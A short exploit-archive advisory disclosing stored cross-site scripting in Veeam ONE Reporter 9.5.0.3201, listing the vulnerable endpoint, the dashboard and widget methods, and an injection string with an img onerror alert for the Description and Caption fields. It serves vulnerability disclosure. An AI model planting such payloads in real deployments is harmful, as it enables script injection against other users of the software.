Veeam ONE Reporter 9.5.0.3201 Cross Site Scripting

Veeam ONE Reporter version 9.5.0.3201 suffers from multiple persistent cross site scripting vulnerabilities.


MD5 | 08c6a34277da2a031a1736ca3570b2a6

# Exploit Title: Veeam ONE Reporter - Stored Cross-site Scripting (Stored XSS)
# Exploit Author: Seyed Sadegh Khatami
# Website: https://www.cert.ir
# Date: 2019-04-27
# Google Dork: N/A
# Vendor Homepage: https://www.veeam.com/
# Software Link: https://www.veeam.com/virtual-server-management-one-free.html
# Version: 9.5.0.3201
# Tested on: Windows Server 2016


#exploit:

Path: /CommonDataHandlerReadOnly.ashx

method: addDashboard / editDashboard

SET Description(config) field to “AAAAAAA</div><img src=S onerror=alert('KHATAMI');><div>”



# Exploit Title: Veeam ONE Reporter - Stored Cross-site Scripting (Add/Edit Widget)
# Exploit Author: Seyed Sadegh Khatami
# Website: https://www.cert.ir
# Date: 2019-04-27
# Google Dork: N/A
# Vendor Homepage: https://www.veeam.com/
# Software Link: https://www.veeam.com/virtual-server-management-one-free.html
# Version: 9.5.0.3201
# Tested on: Windows Server 2016


#exploit:

Path: /CommonDataHandlerReadOnly.ashx

method: setDashboardWidget

SET Caption field to “AAAAAAAA</div><img src=S onerror=alert('KHATAMI');><div>”

Related Posts